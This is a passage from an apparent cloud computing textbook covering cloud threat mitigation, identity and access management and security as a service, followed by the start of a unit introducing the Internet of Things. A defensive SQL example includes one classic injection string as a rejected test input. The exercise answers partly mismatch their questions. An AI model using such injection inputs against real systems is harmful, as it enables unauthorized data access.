components and to enforce isolation between virtual machines (VMs).
Moreover, to avoid shared technology threats in the cloud, a strategy must be
developed and implemented for all the service models, covering infrastructure,
platform, software, and user security. Baseline requirements for all cloud
components must be created and employed in the design of the cloud
architecture. The service provider should also monitor vulnerabilities in the
cloud environment and release patches to fix those vulnerabilities regularly.

In a nutshell, organizations should apply the following mitigation techniques to
protect against this type of threat:

 Apply good authentication and access control methods.


 Monitor the cloud environment for unauthorized activities.
 Use SLAs for patching, weakness remediation, vulnerability scanning,
and configuration reviews.

7.5.10 Protection from SQL Injection, XSS, Google Hacking and Forced
Hacking

In order to secure cloud against various security threats such as: SQL injection,
Cross Site Scripting (XSS), DoS and DDoS attacks, Google Hacking, and
Forced Hacking, different cloud service providers adopt different techniques.
A few standard techniques to detect the above mentioned attacks include:

 Avoiding the usage of dynamically generated SQL in the code (see the
sketch after this list)
 Finding the meta-structures used in the code
 Validating all user-entered parameters, and
 Disallowing and removing unwanted data and characters, etc.
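The first and third points can be illustrated with a short sketch using Python's built-in sqlite3 module; the table and column names below are hypothetical, and the validation rule is only an example policy.

# Parameterized queries and basic input validation against SQL injection.
# Table and column names are hypothetical; sqlite3 is in the standard library.
import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'top-secret')")

def find_user(name: str):
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", name):    # validate user input
        raise ValueError("invalid user name")
    # The placeholder (?) keeps the input as data, never as SQL text.
    return conn.execute("SELECT name FROM users WHERE name = ?", (name,)).fetchall()

print(find_user("alice"))                   # [('alice',)]
try:
    find_user("alice' OR '1'='1")           # classic injection attempt
except ValueError as exc:
    print("rejected:", exc)

Because the user-supplied value is bound as a parameter rather than concatenated into the query string, the injection attempt never reaches the SQL engine as executable text.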

A generic security framework needs to be worked out for an optimized
cost-performance ratio. The main criteria to be fulfilled by the generic security
framework are to interface with any type of cloud environment, and to be able
to handle and detect predefined as well as customized security policies. A
similar approach is used by Symantec MessageLabs Web Security cloud, which
blocks security threats originating from the internet and filters the data before
it reaches the network. The web security cloud's security architecture rests on
two components:

Multi-layer Security: In order to ensure data security and block possible
malware, it consists of multiple layers of security and hence provides a strong
security platform.

URL filtering: It has been observed that attacks are launched through various
web pages and internet sites; filtering of web pages therefore ensures that no
such harmful or threat-carrying web pages are accessible. Also, content from
undesirable sites can be blocked.

With its adaptable technology, it provides security even in highly challenging
environments and ensures protection against new and converging malware
threats. The security model of Amazon Web Services, one of the biggest cloud
service providers in the market, makes use of a multi-factor authentication
technique, ensuring enhanced control over AWS account settings and the
management of the AWS services and resources to which the account is
subscribed. In case customers opt for Multi-Factor Authentication (MFA), they
have to provide a 6-digit code in addition to their username and password
before access is granted to the AWS account or services. This single-use code
can be received on a mobile device every time they try to log in to their AWS
account. Such a technique is called multi-factor authentication because two
factors are checked before access is granted.

A Google hacking database identifies various types of exposed information,
such as login passwords, pages containing logon portals, and session usage
information. Software solutions such as a web vulnerability scanner can be
used to detect the possibility of a Google hack. In order to prevent a Google
hack, users need to ensure that only information that cannot harm them is
shared with Google. This prevents the exposure of sensitive information that
may result in adverse conditions.

7.5.11 Protection from IP Spoofing

In IP spoofing, an attacker tries to impersonate authorized users, creating the
impression that the packets are coming from reliable sources. Thus the attacker
takes control over the client's data or system while posing as the trusted party.
Spoofing attacks can be checked by using encryption techniques and
performing user authentication based on key exchange. Techniques like IPsec
do help in mitigating the risk of spoofing. By enabling encryption for sessions
and performing filtering of incoming and outgoing packets, spoofing attacks
can be reduced.
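Ingress filtering of the kind mentioned above can be sketched with the standard-library ipaddress module: packets arriving from the internet whose source address claims to be internal, private or loopback, or which claims to belong to the organization's own public prefix, are dropped. The prefix shown is an example value only.

# Sketch of ingress filtering against IP spoofing, standard library only.
import ipaddress

# Prefixes owned by the organization (example value; adapt to the deployment).
OWN_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]

def drop_inbound(src_ip: str) -> bool:
    """Return True if a packet arriving from the internet should be dropped."""
    addr = ipaddress.ip_address(src_ip)
    if any(addr in net for net in OWN_PREFIXES):    # outsider claiming to be us
        return True
    return addr.is_private or addr.is_loopback      # RFC1918, 127.0.0.0/8, etc.

print(drop_inbound("203.0.113.10"))  # True  -> spoofed "own" address from outside
print(drop_inbound("192.168.1.5"))   # True  -> spoofed private source
print(drop_inbound("8.8.8.8"))       # False -> plausible external source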

7.6 IDENTITY AND ACCESS MANAGEMENT (IAM)

Identity and access management (IAM) is a framework of business processes,
policies and technologies that facilitates the management of electronic or
digital identities. With an IAM framework in place, information technology
digital identities. With an IAM framework in place, information technology
(IT) managers can control user access to critical information within their
organizations. Systems used for IAM include single sign-on systems, two-
factor authentication, multifactor authentication and privileged access
management. These technologies also provide the ability to securely store
identity and profile data as well as data governance functions to ensure that
only data that is necessary and relevant is shared. IAM systems can be
deployed on premises, provided by a third-party vendor through a cloud-based
subscription model or deployed in a hybrid model.

On a fundamental level, Identity and Access Management encompasses the
following components:

 how individuals are identified in a system (understand the difference
between identity management and authentication)

 how roles are identified in a system and how they are assigned to
individuals

 adding, removing and updating individuals and their roles in a system

 assigning levels of access to individuals or groups of individuals, and

 protecting the sensitive data within the system and securing the system
itself.

7.6.1 Benefits of IAM

IAM technologies can be used to initiate, capture, record and manage user
identities and their related access permissions in an automated manner. An
organization gains the following IAM benefits:

 Access privileges are granted according to policy, and all individuals
and services are properly authenticated, authorized and audited.

 Companies that properly manage identities have greater control of user
access, which reduces the risk of internal and external data breaches.

 Automating IAM systems allows businesses to operate more efficiently
by decreasing the effort, time and money that would be required to
manually manage access to their networks.

 In terms of security, the use of an IAM framework can make it easier to
enforce policies around user authentication, validation and privileges,
and address issues regarding privilege creep.

 IAM systems help companies better comply with government
regulations by allowing them to show that corporate information is not
being misused. Companies can also demonstrate that any data needed
for auditing can be made available on demand.

7.6.2 Types of Digital Authentication

With IAM, enterprises can implement a range of digital authentication
methods to prove digital identity and authorize access to corporate resources.

Unique passwords: The most common type of digital authentication is the
unique password. To make passwords more secure, some organizations require
longer or complex passwords that require a combination of letters, symbols
and numbers. Unless users can automatically gather their collection of
passwords behind a single sign-on entry point, they typically find remembering
unique passwords onerous.
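A small sketch of such a complexity rule is given below, using only the standard library; the exact policy (minimum length and required character classes) is an assumption chosen for illustration, not a universal standard.

# Illustrative password-complexity check (length plus character classes).
# The specific thresholds are assumptions, not a universal standard.
import re

def is_strong(password: str, min_length: int = 12) -> bool:
    return (len(password) >= min_length
            and re.search(r"[a-z]", password) is not None
            and re.search(r"[A-Z]", password) is not None
            and re.search(r"[0-9]", password) is not None
            and re.search(r"[^A-Za-z0-9]", password) is not None)

print(is_strong("Tr0ub4dor&3x!"))   # True: long enough, mixed character classes
print(is_strong("password"))        # False: too short, no digits or symbols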

Pre-Shared Key (PSK): PSK is another type of digital authentication where
the password is shared among users authorized to access the same resources --
think of a branch office Wi-Fi password. This type of authentication is less
secure than individual passwords. A concern with shared passwords like PSK
is that frequently changing them can be cumbersome.

Behavioral Authentication: When dealing with highly sensitive information
and systems, organizations can use behavioral authentication to get far more
granular and analyze keystroke dynamics or mouse-use characteristics. By
applying artificial intelligence, a trend in IAM systems, organizations can
quickly recognize if user or machine behavior falls outside of the norm and can
automatically lock down systems.

Biometrics: Modern IAM systems use biometrics for more precise
authentication. For instance, they collect a range of biometric characteristics,
including fingerprints, irises, faces, palms, gaits, voices and, in some cases,
DNA. Biometrics and behavior-based analytics have been found to be more
effective than passwords.

7.6.3 IAM and Cloud Security

In cloud computing, data is stored remotely and accessed over the Internet.
Because users can connect to the Internet from almost any location and any
device, most cloud services are device- and location-agnostic. Users no longer
need to be in the office or on a company-owned device to access the cloud.
And in fact, remote workforces are becoming more common.

As a result, identity, not the network perimeter, becomes the most important
point of controlling access. One component of a strong security posture that
takes on a particularly critical role in the cloud is identity. The concept of
identity in the cloud can refer to many things, but in this unit we will focus on
two main entities: users and cloud resources.

The user's identity, not their device or location, determines what cloud data
they can access and whether they can have any access at all.

With cloud computing, sensitive files are stored in a remote cloud server.
Because employees of the company need to access the files, they do so by
logging in via browser or an app. IAM helps prevent identity-based attacks and
data breaches that come from privilege escalations (when an unauthorized user
has too much access). Thus, IAM systems are essential for cloud computing,
and for managing remote teams. It is a cloud service that controls the
permissions and access for users and cloud resources. IAM policies are sets of
permission policies that can be attached to either users or cloud resources to
authorize what they access and what they can do with it.

The phrase "identity is the new perimeter" goes back to when AWS first
announced their IAM service in 2012. We are now witnessing a renewed focus
on IAM due to the rise of abstracted cloud services and the recent wave of
high-profile data breaches.

Services that don’t expose any underlying infrastructure rely heavily on IAM
for security. Managing a large number of privileged users with access to an
ever-expanding set of services is challenging. Managing separate IAM roles
and groups for these users and resources adds yet another layer of complexity.
Cloud providers like AWS and Google Cloud help customers solve these
problems with tools like the Google Cloud IAM recommender (currently in
beta) and the AWS IAM access advisor. These tools attempt to analyze the
services last accessed by users and resources, and help you find out which
permissions might be over-privileged. These tools indicate that cloud providers
recognize these access challenges, which is definitely a step in the right
direction. However, there are a few more challenges we need to consider.

7.6.4 Challenges in IAM

Following are some of the challenges in using identity and access management:

 IAM and Single Sign-On (SSO): Most businesses today use some
form of single sign-on (SSO), such as Okta, to manage the way users
interact with cloud services. This is an effective way of centralizing
access across a large number of users and services. While using SSO to
log into public cloud accounts is definitely the best practice, the
mapping between SSO users and IAM roles can become challenging, as
users can have multiple roles that span several cloud accounts.

 Effective Permissions: Considering that users and services have more
than one permission-set attached to them, understanding the effective
permissions of an entity becomes difficult.
o What can s/he access?
o Which actions can s/he perform on these services?
o If s/he accesses a virtual machine, does s/he inherit the IAM
permissions of that resource?
o Is s/he part of a group that grants her additional permissions?
With layers upon layers of configurations and permission profiles,
questions like these become difficult to answer.
 Multi-cloud: According to RightScale, more than 84% of organizations
use a multi-cloud strategy. Each provider has its own policies, tools and
terminology. There is no common language that helps you understand
relationships and permissions across cloud providers.

7.6.5 Right Use of IAM Security

IAM is a crucial aspect of cloud security. Businesses must look at IAM as a part
of their overall security posture and add an integrated layer of security across
their application lifecycle.

Cloud providers deliver a great baseline for implementing a least-privileged
approach to permissions. As cloud adoption scales in your organization, the
challenges mentioned above and more will become apparent, and you might
need to look at multi-cloud solutions to solve them. Some important aspects
are as follows:

 Don’t use root accounts - Always create individual IAM users with
relevant permissions, and don’t give your root credentials to anyone.

 Adopt a role-per-group model - Assign policies to groups of users
based on the specific things those users need to do. Don’t “stack” IAM
roles by assigning roles to individual users and then adding them to
groups. This will make it hard for you to understand their effective
permissions.

 Grant least-privilege - Only grant the least amount of permissions
needed for a job, just like a Lambda function that only needs read
access to a single DynamoDB table (a minimal sketch of this idea
follows this list). This will ensure that if a user or resource is
compromised, the blast radius is reduced to the one or few things that
entity was permitted to do. This is an ongoing task. As your application
is constantly changing, you need to make sure that your permissions
adapt accordingly.

 Leverage cloud provider tools - Managing many permission profiles
at scale is challenging. Leverage the platforms you are already using to
generate least-privilege permission sets and analyze your existing
services. Remember that the cloud provider recommendation is to
always manually review the generated profiles before implementing
them.
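A minimal, provider-agnostic sketch of the role-per-group, least-privilege idea is given below in plain Python; the group names, actions and resources are hypothetical and stand in for whatever policies a real cloud provider would attach.

# Role-per-group, least-privilege permission check (provider-agnostic sketch).
# Group names, actions and resources below are hypothetical.
GROUP_POLICIES = {
    "developers": {("read", "source-repo"), ("write", "source-repo")},
    "auditors":   {("read", "audit-logs")},
}
USER_GROUPS = {"asha": ["developers"], "ravi": ["auditors"]}

def is_allowed(user: str, action: str, resource: str) -> bool:
    """Allow only what some group of the user explicitly grants (deny by default)."""
    return any((action, resource) in GROUP_POLICIES.get(group, set())
               for group in USER_GROUPS.get(user, []))

print(is_allowed("asha", "write", "source-repo"))  # True
print(is_allowed("ravi", "write", "source-repo"))  # False: not granted to auditors
print(is_allowed("ravi", "read", "audit-logs"))    # True

The deny-by-default check mirrors how cloud IAM policies are evaluated: anything not explicitly granted to one of the user's groups is refused.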

7.7 SECURITY AS A SERVICE (SECaaS)

Security as a Service (SECaaS) can most easily be described as a
cloud-delivered model for outsourcing security/cybersecurity services. Much
like Software as a Service, SECaaS provides security services on a subscription
basis hosted by cloud providers. Security as a Service solutions have become
increasingly popular for corporate infrastructures as a way to ease the in-house
security team’s responsibilities, scale security needs as the business grows,
and avoid the costs and maintenance of on-premise alternatives.

7.7.1 Benefits of SECaaS

Following are some of the benefits of SECaaS:

 Cost Savings: One of the biggest benefits of a Security as a Service
model is that it saves money. A cloud-delivered service is often
available in subscription tiers with several upgrade options, so a
business only pays for what it needs, when it needs it. It also reduces
the need for costly in-house expertise.
 The Latest Security Tools and Updates: When you implement
SECaaS, you get to work with the latest security tools and resources.
For anti-virus and other security tools to be effective, they must be kept
up to date with the latest patches and virus definitions. By deploying
SECaaS throughout your organization, these updates are managed for
you on every server, PC and mobile device.
 Faster Provisioning and Greater Agility: One of the best things
about as-a-service solutions is that your users can be given access to
these tools immediately. SECaaS solutions can be scaled up or down as
required and are provided on demand where and when you need them.
That means no more uncertainty when it comes to deployment or
updates, as everything is managed for you by your SECaaS provider and
visible to you through a web-enabled dashboard.
 Free Up Resources: When security provisions are managed externally,
your IT teams can focus on what is important to your organization.
SECaaS frees up resources, gives you total visibility through
management dashboards and the confidence that your IT security is
being managed competently by a team of outsourced security
specialists. You can also choose for your IT teams to take control of
security processes if you prefer and manage all policy and system
changes through a web interface.

Examples of SECaaS include the security services like:

 Continuous Monitoring
 Data Loss Prevention (DLP)
 Business Continuity and Disaster Recovery (BC/DR or BCDR)
 Email Security
 Antivirus Management
 Spam Filtering
 Identity and Access Management (IAM)
 Intrusion Protection
 Security Assessment
 Network Security
 Security Information and Event Management (SIEM)
 Web Security
 Vulnerability Scanning

 Check Your Progress 1


1) How to secure the Cloud?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) What are the various security aspects that one needs to remember while
opting for Cloud services?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
3) How to choose a SECaaS Provider?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………

7.8 SUMMARY

Cloud computing is being widely adopted by businesses around the world.
However, there are various security issues associated with it. In order to
maintain the trust of customers, security should be considered an integral
part of the cloud. In this unit we have focused on the most severe threats to
cloud computing that are considered relevant by most users and businesses. We
have divided these threats into the categories of data threats, network threats,
and cloud environment specific threats. The impact of these threats on cloud
users and providers has been illustrated in this unit. Moreover, we also
discussed the security techniques that can be adopted to avoid these threats.
Towards the end, we discussed IAM and SECaaS.

7.9 SOLUTIONS / ANSWERS

Check Your Progress 1

1. In the 1990s, business and personal data was stored locally and security
was local as well. Data would be located on a PC’s internal storage at home,
and on enterprise servers if you worked for a company.

Introducing cloud technology has forced everyone to re-evaluate cyber
security. Your data and applications might be floating between local
and remote systems and always Internet-accessible. For example, if you
are accessing Google Docs on your smartphone, or using Salesforce
software to look after your customers, that data could be held
anywhere. Therefore, protecting it becomes more difficult than when it
was just a question of stopping unwanted users from gaining access to
your network. Cloud security requires adjusting some previous IT
practices, but it has become more essential for two key reasons:

Convenience over security: Cloud computing is exponentially
growing as a primary method for both workplace and individual use.
Innovation has allowed new technology to be implemented quicker
than industry security standards can keep up, putting more
responsibility on users and providers to consider the risks of
accessibility.

Centralization and multi-tenant storage: Every component, from core
infrastructure to small data like emails and documents, can now be
located and accessed remotely on 24x7 web-based connections. All
this data gathered in the servers of a few major service providers can
be highly dangerous. Threat actors can now target large multi-
organizational data centers and cause immense data breaches.

Unfortunately, malicious actors realize the value of cloud-based targets
and increasingly probe them for exploits. Despite cloud providers
taking over many security roles from clients, they do not manage
everything. This leaves even non-technical users with the duty to
self-educate on cloud security.

That said, users are not alone in cloud security responsibilities. Being
aware of the scope of your security duties will help the entire system
stay much safer.

2. Every cloud security measure works to accomplish one or more of the
following:

 Enable data recovery in case of data loss


 Protect storage and networks against malicious data theft
 Deter human error or negligence that causes data leaks
 Reduce the impact of any data or system compromise

Data security is an aspect of cloud security that involves the technical end
of threat prevention. Tools and technologies allow providers and clients to
insert barriers between the access and visibility of sensitive data. Among
these, encryption is one of the most powerful tools available. Encryption
scrambles your data so that it's only readable by someone who has the
encryption key. If your data is lost or stolen, it will be effectively
unreadable and meaningless. Data transit protections like virtual private
networks (VPNs) are also emphasized in cloud networks.

Identity and access management (IAM) pertains to the accessibility
privileges offered to user accounts. Managing authentication and
authorization of user accounts also applies here. Access controls are pivotal
to restrict users, both legitimate and malicious, from entering and
compromising sensitive data and systems. Password management,
multi-factor authentication, and other methods fall in the scope of IAM.

Governance focuses on policies for threat prevention, detection, and
mitigation. For SMBs and enterprises, aspects like threat intelligence can help
with tracking and prioritizing threats to keep essential systems guarded
carefully. However, even individual cloud clients could benefit from
valuing safe user behavior policies and training. These apply mostly in
organizational environments, but rules for safe use and response to threats
can be helpful to any user.

Data retention (DR) and business continuity (BC) planning involve
technical disaster recovery measures in case of data loss. Central to any DR
and BC plan are methods for data redundancy such as backups.
Additionally, having technical systems for ensuring uninterrupted
operations can help. Frameworks for testing the validity of backups and
detailed employee recovery instructions are just as valuable for a thorough
business continuity plan.

Legal compliance revolves around protecting user privacy as set by
legislative bodies. Governments have taken up the importance of protecting
private user information from being exploited for profit. As such,
organizations must follow regulations to abide by these policies. One
approach is the use of data masking, which obscures identity within data
via encryption methods.

3. Some common cloud security risks/threats include:


 Risks of cloud-based infrastructure, including incompatible legacy IT
frameworks and third-party data storage service disruptions.
 Internal threats due to human error such as misconfiguration of user
access controls.
 External threats caused almost exclusively by malicious actors, such
as malware, phishing, and DDoS attacks.

The biggest risk with the cloud is that there is no perimeter. Traditional
cyber security focused on protecting the perimeter, but cloud environments
are highly connected which means insecure APIs (Application
Programming Interfaces) and account hijacks can pose real problems.
Faced with cloud computing security risks, cyber security professionals
need to shift to a data-centric approach.

Interconnectedness also poses problems for networks. Malicious actors
often breach networks through compromised or weak credentials. Once a
hacker manages to gain a foothold, they can easily expand and use poorly
protected interfaces in the cloud to locate data on different databases or
nodes. They can even use their own cloud servers as a destination where
they can export and store any stolen data.

Third-party storage of your data and access via the internet each pose their
own threats as well. If for some reason those services are interrupted, your
access to the data may be lost. For instance, a phone network outage could
mean you can't access the cloud at an essential time. Alternatively, a power
outage could affect the data center where your data is stored, possibly with
permanent data loss.

Such interruptions could have long-term repercussions. A recent power
outage at an Amazon cloud data facility resulted in data loss for some
customers when servers incurred hardware damage. This is a good example
of why you should have local backups of at least some of your data and
applications.

Check Your Progress 2

1. Fortunately, there is a lot that you can do to protect your own data in
the cloud. Let’s explore some of the popular methods.

Encryption is one of the best ways to secure your cloud computing
systems. There are several different ways of using encryption, and they
may be offered by a cloud provider or by a separate cloud security
solutions provider:
 Encryption of communications with the cloud in their entirety.
 Encryption of particularly sensitive data, such as account credentials.
 End-to-end encryption of all data that is uploaded to the cloud.

Within the cloud, data is more at risk of being intercepted when it is on the
move. When it's moving between one storage location and another, or
being transmitted to your on-site application, it's vulnerable. Therefore,
end-to-end encryption is the best cloud security solution for critical data.
With end-to-end encryption, at no point is your communication made
available to outsiders without your encryption key.
You can either encrypt your data yourself before storing it on the cloud, or
you can use a cloud provider that will encrypt your data as part of the
service. However, if you are only using the cloud to store non-sensitive
data such as corporate graphics or videos, end-to-end encryption might be
overkill. On the other hand, for financial, confidential, or commercially
sensitive information, it is vital.

If you are using encryption, remember that the safe and secure
management of your encryption keys is crucial. Keep a key backup and
ideally don't keep it in the cloud. You might also want to change your
encryption keys regularly so that if someone gains access to them, they will
be locked out of the system when you make the changeover.

Configuration is another powerful practice in cloud security. Many cloud
data breaches come from basic vulnerabilities such as misconfiguration
errors. By preventing them, you are vastly decreasing your cloud security
risk. If you don’t feel confident doing this alone, you may want to consider
using a separate cloud security solutions provider.

Here are a few principles you can follow:

 Never leave the default settings unchanged: Using the default settings
gives a hacker front-door access. Avoid doing this to complicate a
hacker’s path into your system.
 Never leave a cloud storage bucket open: An open bucket could allow
hackers to see the content just by opening the storage bucket's URL.
 If the cloud vendor gives you security controls that you can switch
on, use them. Not selecting the right security options can put you at
risk.

2. Security should be one of the main points to consider when it comes to
choosing a cloud security provider. That’s because your cyber security is
no longer just your responsibility: cloud security companies must do their
part in creating a secure cloud environment and share the responsibility for
data security.

Unfortunately, cloud companies are not going to give you the blueprints to
their network security. This would be equivalent to a bank providing you
with details of their vault, complete with the combination numbers to the
safe.

However, getting the right answers to some basic questions gives you
better confidence that your cloud assets will be safe. In addition, you will
be more aware of whether your provider has properly addressed obvious
cloud security risks. We recommend asking your cloud provider some of
the following questions:

 Security audits: “Do you conduct regular external audits of your
security?”
 Data segmentation: “Is customer data logically segmented and kept
separate?”
 Encryption: “Is our data encrypted? What parts of it are encrypted?”
 Customer data retention: “What customer data retention policies are
being followed?”
 User data retention: “Is my data properly deleted if I leave your
cloud service?”
 Access management: “How are access rights controlled?”

You will also want to make sure you’ve read your provider’s terms of
service (TOS). Reading the TOS is essential to understanding if you are
receiving exactly what you want and need.

Be sure to check that you also know all the services used with your
provider. If your files are on Dropbox or backed up on iCloud (Apple's
storage cloud), that may well mean they are actually held on Amazon's
servers. So, you will need to check out AWS, as well as, the service you
are using directly.

3. Hiring a third-party cloud service for the security of your most critical
and sensitive business assets is a massive undertaking. Choosing a SECaaS
provider takes careful consideration and evaluation. Here are some of the
most important considerations when selecting a provider:

 Availability: Your network must be available 24 hours a day and so
should your SECaaS provider. Vet the vendor’s SLA to make sure
they can provide the uptime your business needs and to know how
outages are handled.

 Fast Response Times: Fast response times are just as important as
availability. Look for providers that offer guaranteed response times for
incidents, queries and system updates.

 Disaster Recovery Planning: Your provider should work closely with
you to understand the vulnerabilities of your infrastructure and the
external threats that are most likely to cause the most damage. From
vandalism to weather disasters, your provider should ensure your
business can recover quickly from these disruptive events.

 Vendor Partnerships: A SECaaS provider is only ever as good as the
vendors it has forged partnerships with. Look for providers that
work with best-in-class security solution vendors and who also have the
expertise to support these solutions.

7.10 FURTHER READINGS

1. Cloud Computing: Principles and Paradigms, Rajkumar Buyya, James
Broberg and Andrzej M. Goscinski, Wiley, 2011.
2. Mastering Cloud Computing, Rajkumar Buyya, Christian Vecchiola,
and Thamarai Selvi, Tata McGraw Hill, 2013.
3. Essentials of Cloud Computing, K. Chandrasekhran, CRC Press, 2014.
4. Cloud Computing, Sandeep Bhowmik, Cambridge University Press,
2017.

Unit 8: Internet of Things: An Introduction

8.1. Introduction to IoT

Internet of Things (IoT) is a massive network of physical devices embedded with sensors,
software, electronics, and network which allows the devices to exchange or collect data and
perform certain actions.

Simply put, IoT is made up of two words: Internet & Things.

 Things – physical devices, appliances, gadgets, etc.


 Internet – through which these devices are connected

IoT aims at extending internet connectivity beyond computers and smartphones to other
devices people use at home or for business. The technology allows devices to be controlled
remotely across the network infrastructure. As a result, it cuts down human effort and paves
the way for accessing the connected devices easily. With autonomous control, the devices are
operable without involving human interaction. IoT makes things virtually smart through AI
algorithms, data collection, and networks, enhancing our lives.

Examples: Pet tracking devices, diabetes monitors, AC sensors to adjust the temperature
based on the outside temperature, smart wearables, and more.

IoT comprises things that have unique identities and are connected to the internet. It has been
estimated that about 50 billion devices/things would be connected to the internet by 2020. IoT
is not limited to just connecting things to the internet; it also allows things to communicate and
exchange data.
Definition: A dynamic global network infrastructure with self-configuring capabilities based on
standard and interoperable communication protocols, where physical and virtual "things"
have identities, physical attributes and virtual personalities, use intelligent interfaces, and
are seamlessly integrated into the information network, often communicating data associated
with users and their environments.

8.2. Characteristics of IoT
1) Dynamic & Self Adapting: IoT devices and systems may have the capability
to dynamically adapt to changing contexts and take actions based on their
operating conditions, user's context or sensed environment. E.g., a surveillance
system adapts itself based on context and changing conditions.
2) Self Configuring: IoT devices allow a large number of devices to work together to
provide certain functionality.
3) Interoperable Communication Protocols: IoT devices support a number of
interoperable communication protocols and can communicate with other devices and
also with the infrastructure.
4) Unique Identity: Each IoT device has a unique identity and a unique identifier
(e.g., an IP address).
5) Integrated into Information Network: IoT devices are integrated into the information
network, which allows them to communicate and exchange data with other devices and
systems.

8.3. IoT Categories:


1. Consumer IoT (CIoT) refers to the use of IoT for consumer applications and devices.
Common CIoT products include smartphones, wearables, smart assistants, home
appliances, etc. Typically, CIoT solutions leverage Wi-Fi, Bluetooth, and ZigBee to
facilitate connectivity. These technologies offer short-range communication suitable for
deployments in smaller venues, such as homes and offices.

2. Commercial IoT: while CIoT tends to focus on augmenting personal and home
environments, Commercial IoT goes a bit further, delivering the benefits of IoT to larger
venues. Think: commercial office buildings, supermarkets, stores, hotels, healthcare
facilities, and entertainment venues.

There are numerous use cases for commercial IoT, including monitoring environmental
conditions, managing access to corporate facilities, and economizing utilities and
consumption in hotels and other large venues. Many Commercial IoT solutions are geared
towards improving customer experiences and business conditions.

3. Industrial IoT (IIoT) is perhaps the most dynamic wing of the IoT industry. Its focus is
on augmenting existing industrial systems, making them both more productive and more
efficient. IIoT deployments are typically found in large-scale factories and manufacturing
plants and are often associated with industries like healthcare, agriculture, automotive,
and logistics. The Industrial Internet is perhaps the most well-known example of IIoT.

4. Infrastructure IoT is concerned with the development of smart infrastructures that
incorporate IoT technologies to boost efficiency, cost savings, maintenance, etc. This
includes the ability to monitor and control operations of urban and rural infrastructures,
such as bridges, railway tracks, and on- and offshore wind farms. Technically speaking,
infrastructure IoT is a subset of IIoT. However, due to its significance, it is often treated
as its own separate category.
5. The last type of IoT is the Internet of Military Things (IoMT), often referred to as
Battlefield IoT, the Internet of Battlefield Things, or simply IoBT. IoMT is precisely
what it sounds like: the use of IoT in military settings and battlefield situations. It is
chiefly aimed at increasing situational awareness, bolstering risk assessment, and
improving response times. Common IoMT applications include connecting ships, planes,
tanks, soldiers, drones, and even Forward Operating Bases via an interconnected
system. In addition, IoMT produces data that can be leveraged to improve military
practices, systems, equipment, and strategy.

8.4. IoT Enablers and Connectivity Layers

IoT enablers include system installers, repairers, craftsmen, electricians, plumbers and
architects who connect devices and systems to the Internet for personal use and for commercial
and other business uses.
As the Internet of Things (IoT) enables devices to make intelligent decisions that generate
positive business outcomes, it is the sensors that enable those decisions. As cost and time-to-
market pressures continue to rise, sensors provide greater visibility into connected systems
and empower those systems to react intelligently to changes driven by both external forces
and internal factors. Sensors are the components that provide the actionable insights that
power the IoT and enable organizations to make more effective business decisions. It is
through this real-time measurement that the IoT can transform an organization's ability to
react to change.

Wi-Fi was designed for computers, and 4G LTE wireless targeted smartphones and portable
devices. Both have been tremendously successful, and both were shaped by the devices
they were intended for. The same goes for 5G, the first generation of wireless technology
designed with extremely small, low-power, and near-ubiquitous IoT devices in mind. Unlike
Wi-Fi and LTE devices, which we handle and plug into power sources on a daily basis, IoT
sensors will operate autonomously for years at a time, often in inaccessible places, without
recharging or replacement. The IoT is also prompting an explosion of new protocols: the
development of a number of different 5G communication standards, not just one or two
network types.

8.5. Baseline Technologies of IoT

According to Jones, the top 10 emerging IoT technologies are:

1. IoT Security: Security technologies will be required to protect IoT devices and platforms
from both information attacks and physical tampering, to encrypt their communications, and
to address new challenges such as impersonating "things" or denial-of-sleep attacks that drain
batteries. IoT security will be complicated by the fact that many "things" use simple
processors and operating systems that may not support sophisticated security approaches.

2. IoT Analytics: IoT business models will exploit the information collected by "things" in
many ways, which will demand new analytic tools and algorithms. As data volumes increase
over the next five years, the needs of the IoT may diverge further from traditional analytics.

3. IoT Device (Thing) Management: Long-lived nontrivial "things" will require
management and monitoring, including device monitoring, firmware and software updates,
diagnostics, crash analysis and reporting, physical management, and security management.
Tools must be capable of managing and monitoring thousands and perhaps even millions of
devices.

4. Low-Power, Short-Range IoT Networks. Low-power, short-range networks will
dominate wireless IoT connectivity through 2025, far outnumbering connections using
wide-area IoT networks. However, commercial and technical trade-offs mean that many
solutions will coexist, with no single dominant winner.
5. Low-Power, Wide-Area Networks. Traditional cellular networks don't deliver a good
combination of technical features and operational cost for those IoT applications that need
wide-area coverage combined with relatively low bandwidth, good battery life, low hardware
and operating cost, and high connection density. Emerging standards such as narrowband IoT
will likely dominate this space.

6. IoT Processors. The processors and architectures used by IoT devices define many of their
capabilities, such as whether they are capable of strong security and encryption, power
consumption, whether they are sophisticated enough to support an operating system,
updatable firmware, and embedded device management agents. Understanding the
implications of processor choices will demand deep technical skills.

7. IoT Operating Systems. Traditional operating systems such as Windows and iOS were
not designed for IoT applications. They consume too much power, need fast processors, and
in some cases, lack features such as guaranteed real-time response. They also have too large a
memory footprint for small devices and may not support the chips that IoT developers use.
Consequently, a wide range of IoT-specific operating systems has been developed to suit
many different hardware footprints and feature needs.

8. Event Stream Processing: Some IoT applications will generate extremely high data rates
that must be analyzed in real time. Systems creating tens of thousands of events per second
are common, and millions of events per second can occur in some situations. To address such
requirements, distributed stream computing platforms have emerged that can process very
high-rate data streams and perform tasks such as real-time analytics and pattern
identification.

9. IoT Platforms. IoT platforms bundle many of the infrastructure components of an IoT
system into a single product. The services provided by such platforms fall into three main
categories:

Low-level device control and operations such as communications, device monitoring and
management, security, and firmware updates; IoT data acquisition, transformation and
management; IoT application development, including event-driven logic, application
programming, visualization, analytics and adapters to connect to enterprise systems.

10. IoT Standards and Ecosystems. Standards and their associated application programming
interfaces (APIs) will be essential because IoT devices will need to interoperate and
communicate, and many IoT business models will rely on sharing data between multiple
devices and organizations. Many IoT ecosystems will emerge, and organizations creating
products may have to develop variants to support multiple standards or ecosystems and be
prepared to update products during their life span as the standards evolve and new standards
and APIs emerge.

8.6. Sensors
Sensors are the devices used for sensing physical quantities in things, devices and the
environment. A sensor is a device that provides a usable output in response to a specified
measured quantity. The sensor picks up a physical parameter and converts it into a signal
suitable for processing (for example electrical, mechanical or optical), exploiting the
characteristics of a device or material to detect the presence of a particular physical quantity.
